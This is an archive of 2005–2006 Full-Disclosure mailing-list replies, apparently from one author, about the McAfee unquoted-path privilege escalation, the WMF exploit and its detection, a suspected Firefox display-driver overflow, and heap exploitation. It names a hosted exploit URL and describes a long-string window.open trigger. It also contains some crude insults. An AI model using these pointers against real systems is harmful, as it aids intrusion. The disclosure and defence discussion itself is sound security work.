of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Privilege escalation in McAfee VirusScan Enterprise8.0i (patch 11) and CMA 3.5 (patch 5)

2005-12-22 Thread [EMAIL PROTECTED]

Reed Arvin wrote:
>The issue occurs when the naPrdMgr.exe process attempts to run the
>C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE file. Because of
>a lack of quotes the naPrdMgr.exe process first tries to run
C:\Program.exe.
>If that is not found it tries to run C:\Program Files\Network.exe. When
that
>is not found it finally runs the EntVUtil.EXE file that it was originally
>intending to run. A malicious user can create an application named
>Program.exe and place it on the root of the C:\ and it will be run with
>Local System privileges by the naPrdMgr.exe process. Source code for an
>example Program.exe is listed below.

While I agree this behavior is a bug, it is not a vulnerability.  Properly
secured installations of Windows aren't susceptible to this attack because
the ACL on the root of the installation volume denies users other than
Administrators the ability to write to files.

The same ACL is in place on the Program Files directory, for obvious
reasons, and it is inherited by software installations.

Any Windows system without these ACLs in place is vulnerable to a myriad of
attacks -- see Microsoft Security Bulletin MS02-064:

http://www.microsoft.com/technet/security/bulletin/ms02-064.mspx

mail2web - Check your email from the web at
http://mail2web.com/ .

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Someone wasted a nice bug on spyware...

2005-12-28 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
I think you shouldnt be security specialist for putting crackz.ws in
your banned website list , hehehe , this is probably the most funny
warez site around there and I bet these loosers aren't knowing the
number of ie exploits they are hosting on there own domain lol...

Paul wrote:
> Indeed, this is quite an annoyance. Buytoolbar.biz/xpl.wmf also works. I
> sent it to Microsoft a few days ago and they're looking into it. It looks
> like it's going to be a bad week at MSRC :(
>
> I whoised the owners of a couple domains who host the image and got the
> following information:
>
> Domain Name: BEEHAPPYY.BIZ
> Domain ID:   D9564716-BIZ
> Sponsoring Registrar:ONLINENIC, INC. D/B/A
> CHINA-CHANNEL.COM
> Sponsoring Registrar IANA ID:82
> Domain Status:   ok
> Registrant ID:   OLNIC_919328_0_0
> Registrant Name: Mikhail Sergeevich Gorbachev
> Registrant Organization: Mikhail Sergeevich Gorbachev
> Registrant Address1: Krasnaya ploshad, 1
> Registrant City: Moscow
> Registrant State/Province:   Moscow
> Registrant Postal Code:  176098
> Registrant Country:  Russian Federation
> Registrant Country Code: RU
> Registrant Phone Number: +7.0957643453
> Registrant Facsimile Number:     +7.0957643453
> Registrant Email:[EMAIL PROTECTED]
> Administrative Contact ID:   OLNIC_919328_1_0
> Administrative Contact Name: Mikhail Sergeevich Gorbachev
> Administrative Contact Organization: Mikhail Sergeevich Gorbachev
> Administrative Contact Address1: Krasnaya ploshad, 1
> Administrative Contact City: Moscow
> Administrative Contact State/Province:   Moscow
> Administrative Contact Postal Code:  176098
> Administrative Contact Country:  Russian Federation
> Administrative Contact Country Code: RU
> Administrative Contact Phone Number: +7.0957643453
> Administrative Contact Facsimile Number: +7.0957643453
> Administrative Contact Email:[EMAIL PROTECTED]
> Billing Contact ID:  OLNIC_919328_3_0
> Billing Contact Name:Mikhail Sergeevich Gorbachev
> Billing Contact Organization:Mikhail Sergeevich Gorbachev
> Billing Contact Address1:Krasnaya ploshad, 1
> Billing Contact City:Moscow
> Billing Contact State/Province:  Moscow
> Billing Contact Postal Code: 176098
> Billing Contact Country: Russian Federation
> Billing Contact Country Code:RU
> Billing Contact Phone Number:+7.0957643453
> Billing Contact Facsimile Number:+7.0957643453
> Billing Contact Email:   [EMAIL PROTECTED]
> Technical Contact ID:OLNIC_919328_2_0
> Technical Contact Name:  Mikhail Sergeevich Gorbachev
> Technical Contact Organization:  Mikhail Sergeevich Gorbachev
> Technical Contact Address1:  Krasnaya ploshad, 1
> Technical Contact City:  Moscow
> Technical Contact State/Province:Moscow
> Technical Contact Postal Code:   176098
> Technical Contact Country:   Russian Federation
> Technical Contact Country Code:      RU
> Technical Contact Phone Number:  +7.0957643453
> Technical Contact Facsimile Number:  +7.0957643453
> Technical Contact Email: [EMAIL PROTECTED]
> Name Server: NS1.PERLINK.BIZ
> Name Server: NS2.PERLINK.BIZ
> Created by Registrar:ONLINENIC, INC. D/B/A
> CHINA-CHANNEL.COM
> Last Updated by Registrar:   ONLINENIC, INC. D/B/A
> CHINA-CHANNEL.COM
> Domain Registration Date:Tue Apr 26 15:43:16 GMT 2005
> Domain Expiration Date:  Wed Apr 25 23:59:59 GMT 2007
> Domain Last Updated Date:Thu Aug 11 02:33:14 GMT 2005
>
>
> The name Mikhail Sergeevich Gorbachev that this domain is registered to
> leads me to believe that it is registered with false information (for those
> of you who don't know, Gorbachev was a former Soviet president).
>
>
> Domain Name: B

Re: [Full-disclosure] test this

2005-12-29 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
norton detects it under the corporate version BloodHound.Exploit.56

http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.56.html

I guess you tried the norton customer version which isn't virus
definition updated everyday, companies are more at risk than poor
customers I guess.

Todd Towles wrote:
> Got a new test of it this morning? I am surprised Norton doesn't have it
> yet.
>
>  TrendMicro has released pattern file = 3.135.00
>
> It appears to pick up all the trojans using the WMF exploit as of right
> now. Variants could affect this however.
>
> Is this buffer overflow pretty specific like the older GIF exploit? If I
> remember correctly, there were really only two ways to make the GIF
> exploit work, so the detection was pretty solid. Is this exploit
> similar? Or does it have some trick point that could be used to fool
> known sigs?
>
> -Todd
>
>> -----Original Message-
>> From: [EMAIL PROTECTED]
>> [mailto:[EMAIL PROTECTED] On Behalf
>> Of Thierry Zoller
>> Sent: Wednesday, December 28, 2005 5:24 PM
>> To: full-disclosure@lists.grok.org.uk
>> Subject: Re[2]: [Full-disclosure] test this
>>
>> Dear List,
>>
>> VirusTotal on 12/29/2005 at 00:16:19 (CET) :
>> AntiVir 6.33.0.70   12.28.2005  TR/Dldr.WMF.Agent.D
>> Sophos  4.01.0  12.28.2005  Troj/DownLdr-NO
>> ClamAV  devel-20051108  12.29.2005  Exploit.WMF.A
>>
>> --
>> http://secdev.zoller.lu
>> Thierry Zoller
>> Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ7QGGa+LRXunxpxfAQIIHg/+LB1Ca+0lG4Hn+3GRRXeDkZFBck3OARqA
uhmnUE24FjF5ds7aIWVtamgHxXmFITT/OxuxA9NZlnIK3CzrojOXFmr7IRnFJfNa
QUvp5Q36Rts3oF3CZ6c4KOAHEr8eS1aGY5nuSIy3GCbps/t6wLfuo0Hv4F3bweHy
qGD3RMTuw4G3zbyeBhRWo4Egp0CpGSMo+UVQJ7m82BQqLGb6sp8xDn9IdNB4c94k
0x6iWXd/C6pLkBZH+0aWi5I0UdoHnxZgYQGbNpx9/b7TeK3SsW4FJX9y/ZCscc1O
dUBNnT2FK7vPpN3DcAAXXlHzAqWgWOXoSjsMkZ9qJXz/nAAxZMZ78hQGbvMEpWMd
UJ5VLLr5sWhug8WWRsWkY8LzkaqgRDnoCt415xytFFCBGlwFVoFvLv2pIss6bPtt
ObWr79G68wt6hmsuAJ7eU59m5gdvw8U7H1LwtTHjEbj32OFPHP7w3wYdwDRWO6e3
dzvWYQBMdHXvXz6um9aERCJYc8SSmZCMKGPS7WYG7fOQMLvVW2GZ0egLwNVXiC99
KRbW4GnysCwxyQ/pR2unT/eaMhXlviGof57wZBNenibSS4UXPmoAK4sbzLWiox2C
P3IGbWSF5YgruZYG/4Wr8k+pqAZC0/tNv2uKIlzSNyXucm/n2b9iKDvSA11+PfJ3
WfNRbbsHc9M=
=v7Aj
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Static Blocking for the WMF Exploit - over50known variants

2005-12-29 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
I think jerome athias pubbed a working workaround about unloading a
dll but anyway the most evident countermeasure while browsing website
and wich I guess everyone does, it's to use firefox instead of IE :)

Discussion Lists wrote:
> Message Got it . . . the mscracks site is still available, so I
> have been running my tests from that, and I think I may have a
> workaround for anyone who is interested, but I need people to help
> me test it. Here's what I did:
>
> First: I created a virtual machine with SP2 installed, AVG Free AV
> and updated it.  Then I went to the mscracks site.  I did this
> running as admin on my computer BTW.  I noticed as the page came
> up, AVG Free alerted me to a bunch of infections.  Bad news.
>
> Last: I reverted the virtual machine to the pre-mscracks state
> (with SP2, and AVG Free), and updated AVG Free.  I then ran some
> code that activates Window's SAFER mechanism for Internet Explorer.
> I will attach a link at the end of the email for more info.  I
> confirmed the IE was running with reduced privs, and then opened
> MSCracks. AVG Free didn't complain once about infections and such.
>
> To me that means that reducing browser privileges thwarts this
> exploit.  Can someone else test this for me as well?  Anyone
> interested in the VBScript code I used for SAFER email me as well.
>  I will be happy to send it along.
>
>
>
> -Original Message- *From:* Larry Seltzer
> [mailto:[EMAIL PROTECTED] *Sent:* Thursday, December 29, 2005
> 9:07 AM *To:* Discussion Lists; full-disclosure@lists.grok.org.uk
> *Subject:* RE: [Full-disclosure] Static Blocking for the WMF
> Exploit - over50known variants
>
>>> Sorry if this was asked before, but how do I know if my machine
>>>
> has been compromised?  I am working on a way to contain any damage
> caused by this exploit, and it would be helpful to know for sure
> that what I am doing is working or not working.
>
> Unfortunately, I think the test for this is specific to each
> variant and not to the WMF vector. IOW, there is no one test.
>
> Larry Seltzer eWEEK.com Security Center Editor
> http://security.eweek.com/ http://security.eweek.com/>
> http://blog.ziffdavis.com/seltzer Contributing Editor, PC Magazine
> [EMAIL PROTECTED]
>
>
>
> --
>
>
> ___ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ7QiE6+LRXunxpxfAQJVhw//T4dpRgMkFgMFX0o/4SeoICMG+MUcDaq1
+/hIKESLTo2EZ5Lhnkog9hWOwqCQYlNy1EZOBbInUauW44nrXdvGOcBl/5ntRpGe
KqBtHT2amBzoQ8LUJzIgofiQ6atUEw1n40APQhCqrAXI6rR/Vx3r69kBQwG04zez
DvPmy7OfOVt1acqUOg9Ytl3rSGUeoJQStIGRy3obdwqoCTk8YX9ep2zwDQgxQ38+
75DExrHKOPof050XVzHEELToYXM13PgEo4v82+r6qZrW8vl4cq2OBqy9FVTPsvZS
wEr+VF+asAAAilTMNAffA2XrMTzfOm/Zd+b7jzsZS2FiAhH8aeSgDQum5mU18P6v
Wf9wikl/lfyPN/BTb+m8JHBX4lYZv8k4nA9j/0uXgesYTDcotXxLLJtYDZpRONaZ
DF3SVBGLAa1SymtOejOm1WatcIkQ1O349E2DIU4UzIq1mDGom7vvR4MLFJYkULWQ
YkiJ09nRFxUkc/Q1CbEt5+QG8ZvK3XKOjz6/yzFSsv/NIu7Y7xaamglJK52b0zAK
82ILJdSHjRT6iaMQvkskZ/ENDXsfBIvfHTQkyIY4dD1AdJJsz5+YFwox1bmCfrXq
Hk26NaBASC+z30GrwyJJyuynmwP2fRC0Qj/qiKLZgPwTQRuaKBZR3dOSC9Xj7bSB
rRLs89RvQEA=
=Bjr8
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] test this

2005-12-29 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
not your fault todd, they are too gay at cert

http://www.us-cert.gov/cas/techalerts/TA05-362A.html

huhu...

Todd Towles wrote:
> 
> Peter wrote:
>> Perhaps you should read about it on Microsoft's site.
>> It's not a buffer overflow.  WMF files since at least Windows
>> 3.0 days have been allowed to carry executable code in the
>> form of their own SetAbortProc handler.  This is perfectly
>> legitimate, though the design is a poor one.  The only thing
>> that has changed is the code that is being executed.
>
> You are correct, that was my oversight in typing (minus the thinking).
> No bufferoverflow ;)
>
> -Todd
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ7RkXq+LRXunxpxfAQICJRAAik70JSLJaqB1yH94laNQ5v/SrFzS/itQ
3Mvij4Fc3nPriiu6taoaM09FccTmlfBgq+1ltESErVzOnny9bK95A4ZZjAx7KXFP
U7ExVp5DBJ4EWYw4Dx0/CPHx4Jyr1dstWNR1g2+kiCOOI1RGII/e9Vq7mJ/49ZhY
Ag1I2AkAvySy0c9nAPFP8uvCfrdIgNOsdhStL0yQiayv0j2zfA+kyBCGl5jrI+rH
iYBe4MaY8IfRsk39jTQQ5QhIZ6M+xcRv2AHWcjD7pQPAmVxkeUxlwS5ZkguBTeHr
ZyKXFZgIphLkHaX07+mwIbSqz2KpfTWY/x0QFxskbBFi+ztbhqlWjMVR7ELgLN8P
S5pKcWyCt0sT4IM8enZO+aijyb0Qudgy/YpY6a0f2dY/u3tBojaDFrrOHNcYhwCa
dcHDVrIKmz9wpZ35vQQXR9wR8T31V0+Ex2J1hwDYhA+KqBar0nc/28D62Y5YZciU
5yE6YDFNEo7VF+uyPkQ5k+C+MH2Kns18itAmCIdFK5d9jvv7EExrGAVb2h6Vb4pD
GDsXB2a4rV7AFk1PfLqYknEpiNE3/+BXyMa0vYaNZ7yrn8FHcHzTg7OM0ykPivhH
JkV+tPjmWoqSXxuPFaov8zl7SfKl2lQWB5ffe+BTJv1jlTamdKjdCBiLYYM5htg6
lH6ttCadrdE=
=dLUb
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Buffer Overflow vulnerability in Windows Display Manager [Suspected]

2006-01-02 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
he said me offline around 52000 chars , and you do not need to press
ok to trigger it, its supposed to occur when do you copy paste the
chars within the area, however here nothing happen on xp sp2 en +
firefox 1.5 , I can just see my AAA buffer replaced by a blank buffer
once I paste it in the box..




Stan Bubrouski wrote:
> Well if you look at the fact there is no title on titlebar and the
> fact the active tab is Untitled, I'd hazard to guess its something he
> manually entered into the address bar, and so we don't even know if
> this is exploitable by clicking a link or whatnot.
>
> Not exactly sure why this was posted if no details are provided.
> Anything else for us Sumit?
>
> -sb
>
> On 1/2/06, Lise Moorveld <[EMAIL PROTECTED]> wrote:
>> Dear Sumit,
>>
>> Could you tell me how you exploited this buffer
>> overflow issue in Firefox so I can try and reproduce
>> it? I notice a lot of A's in your address bar but I'm
>> not sure whether that's it and if so, how many A's are
>> used.
>>
>> Regards,
>>
>> Lise
>>
>> --- Sumit Siddharth <[EMAIL PROTECTED]> wrote:
>>
>>> Hi,
>>> The Windows display manager crashes when a BOF is
>>> attempted on a mozilla
>>> firefox.
>>> This has different results on different windows
>>> machine.
>>> In Windows XP only the display manager crashes ,
>>> whereas on a Windows 2000
>>> server the BSOD(Blue screen of death )appears and
>>> the system hangs.
>>> I am using Firefox 1.0.6. I think that the bug is in
>>> the display driver and
>>> not with firefox. Kindly find a screen shot attached
>>> with this email.
>>>
>>> Thanks
>>> Sumit
>>>
>>>
>>> --
>>>
>>> Sumit Siddharth
>>> Information Security Analyst
>>> NII Consulting
>>> Web: www.nii.co.in
>>> 
>>> NII Security Advisories
>>> http://www.nii.co.in/resources/advisories.html
>>> 
>>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter:
>>>
>> http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia -
>> http://secunia.com/
>>
>>
>>
>>
>> __
>> Yahoo! DSL ? Something to write home about.
>> Just $16.99/mo. or less.
>> dsl.yahoo.com
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>> --
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ7mbVK+LRXunxpxfAQLGTxAArIU8bpjYUITigxk5qhadp68ug9qrF3Db
hd/lmUF1G2R6jbG97OC9C0HkNJZdgg61xMPPlsNwBIfk7qxcMeXSE23I5y/T2nDX
E4gNdiGqmhXa+maLeSYII3YqxVIeAENh6LL/oE9wiiajkrCj9QI2lcfYe6GJZkv5
yW2INyTOWt/Qca465HoV1PwTt6taO5R/AyjTKoO8PjaukUPHrMYt2tJY+p0KvrRc
fpvbIXMNQ80/1gTE7KCJeMDtzeiNH8JwxebNpOyU6lcnyLtNH7FSup21DyBJWTg0
bvwpvGQetPbFhJttqtWv6tJU7vF3NE4Q6sASV2EokcjYbAkts+fkxi+zrrVhgLWA
kLFpq8OVV+XxmIcR686xGnJhxnlHtrfAT8A8OFwkzvRQnsv4N6UMXXrHJFWh+uJ5
cyWMzaGdUvVkobcFwUvWyG26TsT4Nap56bi/VOVKxkyRrdVPRCTzqHL80GqBJ/I2
SQeE6Q7/b4HL8rreAvUBhP3N0zctxjUTAnfiTS7+XTYsuj8Q5UVKk9rNFRl/9pif
zG5kQCEGzQmWSnMi5OfAheuVJMorb4tVta0/l5kgIas/DCv74VwQ5p7EnfBErX5p
aQLia8VosnSSjPf9Yx7hzOvqQR+e8W1uIHiKXhbxGTnl/HiJvLvnqskxGwajnSPJ
10D7YhdlAHE=
=/Zt9
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Buffer Overflow vulnerability in Windows Display Manager [Suspected]

2006-01-03 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
haven't such driver here , it should be a third party driver security
bug probably within "*Controller Hub for Intel Graphics Driver"*

http://www.dynamiclink.nl/htmfiles/rframes/sys-i01.htm



Sumit Siddharth wrote:
> I think the problem is with the intel driver and particularly with file
> ialmnt5.sys
> Hope it helps
> Sumit
>
>
>
> On 1/3/06, *Sumit Siddharth* <[EMAIL PROTECTED]
> <mailto:[EMAIL PROTECTED]>> wrote:
>
> Dear All,
> Sorry for the delayed response.
> I  had success in exploiting it remotely by a simple javascript
> window.open("<a  rel="nofollow" href="http://aa..."">http://aa..."</a>;);. But i think it
> doesnt work with some drivers.I am using XP ,professional, SP2.
> and firefox 1.0.6. I am using a string of about 53,000 char to
> overflow the buffer.
> Thanks
> Sumit
>
>
>
>
> --
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ7pN+K+LRXunxpxfAQKBqA//YxoeFIr1rkaCixpPr34+KpDiUAKN7xss
M6ZH3ZmpqZ03yLajS8XBWIyv5uTXDuLhUQrrObvak4n6mQ+7g6YffEYQBNyIcsEm
Gxyd8uDmkwX9MeAslByvrqobj/6i4oC4sj5Lq9Ui/JCqsw5KNaBP8ZAym48HiMFM
bI3kqvSGVm++bavWrK8+FunnVHCSDezFL64Jxh6MAVU2MNR+Z2qufC+aQtIpGw7s
nyWisynx6csTp9US5qmeuVdrcwk9DeACzX+z5eAEaevLRcl7ElcpcMht21U5scMd
FTLTtN9Ao4hewQrOe05BAo3AwNmzpt3Kgay3DLtN/n7a9LqPifw9FKp5EtdYLKyM
R16AwG5PaYQXrnsY0Udwz4yAYucEYjEOSyslVf4VILyzFWdKfAgXApbbr4W2nKXx
VQ0BBWbOYnAuAPJYk85WpAZfbFX98tglGTGT/0XRO3Buyk5T50AC4VqxlF17w7+8
T6bO74xpZNi5t5fzFTqt5kZZZ6IXfSonu/SVA/tfiOJwIExo7zEUwu4vsYoMtxaR
HqFlMQyuJhp0aTjaggrFaYQ8XR7tnZherteAYdaw0k3mUPCWfXR3xz26daOpUDKu
ewsDbuq+cglVD5qym246WVYSyiPLKKBXvWPLbuoG5ngqmyQiKydIQ9UMMdJvHh5c
7DtDjiHOH8s=
=VEy3
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Win32 Heap Exploits

2006-01-03 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

or this is because the bug he's working on has already been discovered
& patched by an exception throwing the control to an handler, for
example , you will notice exactly the same thing for the WINS bug
discovered by n.waisman, if you are trying to exploit it yet on a
patched ms box within ollydbg , you will be able to congrats because
the debugger is able to handle the exception apart of the program ,
but without of course it's not possible, wins.exe throw us to another
point, so anyway I bet the bug you are working on has been already
discovered and patched.

Nicolas RUFF wrote:
>> But if i execute the server without ollydbg there happen nothing.
>>  Have anybody an idea what i make wrong. Test on a winxp sp1
>> system.
>
> As pointed out multiple times, Windows heap is not the same whether
> the program is flagged as "being debugged" or not.
>
> You should always *attach* the debugger to the process and not run
> the process from within the debugger.
>
> Regards, - Nicolas RUFF
> ___ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
>
>
>
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ7p7xa+LRXunxpxfAQJG2g/8DC+lPUQePKeSlFtA/APHtvijX90GG98c
d5csM329v8CUOYpFUes88Mixtg1EOv2omb4Tkk6dFBtU2oIDJ1QxD0P1x3JUW6Op
9rUhcpeLcZmxLpe4VU8izL5szJlfyiOnxPlH8TznCF5AX2svxwqfFcNTQritgC61
C6C6rLzxOg+qJteKChwIn4Y0zPEpYpqLqkXDoqCSrrWmwfD3sFVkUmor4GfE6vnl
T2tkJDViBq7vlKXpZs63Sr+9/J7UpB48CiugxZj08V37lxYlgXOuxV4agXwIcwFj
8CFV5GvmUi6N+u2LdFlFFaSzHT6GWPWyavtg4P0ND/0dgrYHPIwzMhR65VHdiWLT
vczI/6Fwi2OQjRfZXWKviWSpACb1qizNXTuobp0FzS9Nio7NKNrWEzIVFwdT6O+A
V56a6h8g5JoomSHkLJXTU6MWC5/TREJ6zh4kPr6dUYUdSrqJISKxN9ssorK7khik
jqlM/olO5brruQBb+ytPt4MmW0vRFhZocHlMlWAGb1dClLaInvNawZ6rDgCIXdxj
Q/tGK0jozgcDroaG2/DG7dhHndYROa9A0UFnJHlSfKX68hkwMbjpHsZVDRZ27QJF
ATXMEm0S2vfWaUDRbtS7Dgs5fea8+RVM0+5uHNqrbEQlKQq4LhB58pVkWW8k2vDg
GQ1BljBy3II=
=CQ2k
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WMF round-up, updates and de-mystification

2006-01-03 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
he try to be good , but everyone remember his shit talks firing about
netdev & cie , nice try ..

InfoSecBOFH wrote:
> So this patch is trusted because you said so?
>
> I have tested and confirmed that this patch only works in specific
> scnenarios and does not mitigate the entire issue.  Variations still
> work.
>
> On 1/3/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
>> Quite a bit of confusing and a vast amount of information coming from
>> all directions about the WMF 0day. Here are some URL's and generic facts
>> to set us straight.
>>
>> The "patch" by Ilfak Guilfanov works, but by disabling a DLL in Windows.
>> So far no problems have been observed by anyone using this patch. You
>> should naturally check it out for yourselves but I and many others
>> recommend it until Microsoft bothers to show up with their own patch.
>>
>> Ilfak is trusted and is in no way a Bad Guy.
>>
>> You can find more information about it at his blog:
>> http://www.hexblog.com/2005/12/wmf_vuln.html
>>
>> If you are still not sure about the patch by Ilfak, check out the
>> discussion of it going on in the funsec list about the patch, with Ilfak
>> participating:
>> https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
>> Occasional information of new WMF problems keep coming in over there.
>>
>> In this URL you can find the best summary I have seen of the WMF issue:
>> http://isc.sans.org/diary.php?storyid=994
>> by the "SANS ISC diary" team.
>>
>> In this URL you can find the best write-up I have seen on the WMF issue:
>> http://blogs.securiteam.com/index.php/archives/167
>> By Matthew Murphy at the "Securiteam Blogs".
>>
>> Also, it should be noted at this time that since the first public
>> discovery of this "problem", a new one has been coming in - every day.
>> All the ones seen so far are variants of the original and in all ways
>> the SAME problem. So, it would be best to acknowledge them as the
>> same... or we will keep having a NEW 0day which really isn't for about 2
>> months when all these few dozen variations are exhausted.
>>
>> A small BUT IMPORTANT correction for future generations:
>> The 0day was originally found and reported by Hubbard Dan from Websense
>> on a closed vetted security mailing list, and later on at the Websense
>> public page. All those who took credit for it took it wrongly.
>>
>> Thanks, and a better new year to us all,
>>
>>Gadi.
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ7sAOa+LRXunxpxfAQJCChAA58xG3lsiY5Gi5dQd/lPtRcznLAGKAY9i
Hosk4mWRnXep9Gd2XpztNNBbePg4l6tSvKKu26bFan+B3A3jYvMpZ8CBq9nptRz+
MrCb9N4vApJhPTKL1jiydj2/No9QB9g5e6S23Krjj4cLZTLQJqwE2/sHm70ZqIzO
BUUc8EKDuDgqx//EC4NZwQtZTQmBJNtn252tqP5F5et1t7RRPmbz7Yz5FPqP26wF
PpNxDXONEMCdDL0RiTdPM6qUpKI510BwuBOJPrJxrb8CCas6wEDSOkb2QiIO//35
yQKpBV4RK2mJcA28BoHkLPrYbOnMTSbioGSFaJ7FJBlsGi14rXWchpZS8ougjYX4
hZCxcz1y05ONM37f2RBLffszp96pi83x3HCjIYtMGCwG8oJJ3KteR7ScTOGrccLC
xIASkilhdWppKfG6J9+TWp5xOXHxjOtn8RiacOovslBnl5FssB4WjQdqtKuGnstf
B2/+VKOtck7mRue/W6Dz0qFrG+teC2MQUNJX66zSyJnTEvrqFgWvlr/j9MEDqXQR
K2oTV8XnK8R4vCi813LxHkFlVO6Vj5CYUnrWoMMjQdEyznN3IVGU3IQXXIiDuPpb
3Pa2YJvxl6gcGRPaSNVGrxH6Yp238jsdynMKvsWNSYsVZuxoiM3i052tmbTY8b89
DBwptgDJqo0=
=YwgE
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WMF Exploit

2006-01-04 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
I don't think because here win98 doesn't recognize the .wmf extension.


Technica Forensis wrote:
>> I have 2 win98 machines here, my own and a customer's, both are
>> unpatched, (one runs IE6 sp1 the other IE 5.5) I cannot find
>> shimgvw.dll on either.
>
> is GDI32.dll on either of those systems?
>
> ref: http://www.viruslist.com/en/weblog?discuss=176892530&return=1
> ___ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
>
>
>
> .
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ7vv4K+LRXunxpxfAQIsiRAAzRlv68VOGRCd8nN36JUUZCAUF93r7MH+
UbSIpAvJxMw4oICChhG1TsulgoGDlOn4JCtlQWobp2+WO7V4RqGg8LBF5LxwoW1n
XQU9WcocqNo56P7lmsDjQZ3CoGRAdW1V7/JiW2KjcOn8kjk6m6IMld/OEFoITE+4
p9FN9blN36bEXzqI6DAQ8BNAy9B/3RgnghddQiAqnR5xMiKw2ylOat7Jx76usgX0
Q53WLg0v0EGS6+a8YNmNLzYaUs4ttReRDo1PvazKF+utnIZHZ4R+OyS2fVB+wtNf
32ZTSo6v5UwV5VmZQovpIKb/Uy0UPjZOVIWwoayKBf1zZpoH4y12tU57XQZR7kC1
GpvvdM4ZOB1DbY1E2rxx8ziq6JhMjrgRV/4KkHBXLvaNvDzb5CzPIUw816ol5JI0
3VCQzSn5TgYrPgSvM3/F2m24BPwHiIvQL7Ss9MMj4pvGb5/RhAPJKfJ9K1MId5fN
fBpvNsBsArRU29dLuIYU9OUPeZtlbWd6TjdxSBdU3oqRDmUYlp6LQGWY99FlXVJj
